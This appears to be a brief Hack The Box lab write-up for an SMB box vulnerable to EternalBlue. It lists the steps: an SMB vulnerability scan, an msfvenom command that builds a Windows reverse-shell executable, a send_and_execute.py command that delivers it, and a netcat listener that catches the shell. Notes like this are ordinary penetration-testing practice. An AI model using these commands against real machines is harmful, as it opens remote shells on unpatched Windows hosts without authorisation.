Tags:htb,hacking Related to:practice,htb,write-up,smb,microsoft-ds,eternal-blue See also: Index: 🗂️Index of HTB Writeups
Script scan on ports open after full scan
Scanned for smb-vulns as it smb is very vulnerable
We can see two RCEs
Exploit is here.
Create windows tcp reverse shell with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe > eternalblue.exe
use send and execute.py to send shell to system. python send_and_execute.py <victim-ip> /path/to/eternalblue.exe
Open a netcat listener for that before that. “nc -nlvp 4444
Eternal blue gives root access in this sceneario
whoami exe is not available in this machine so use the steps as in this link https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/windows-boxes/legacy-writeup-w-o-metasploit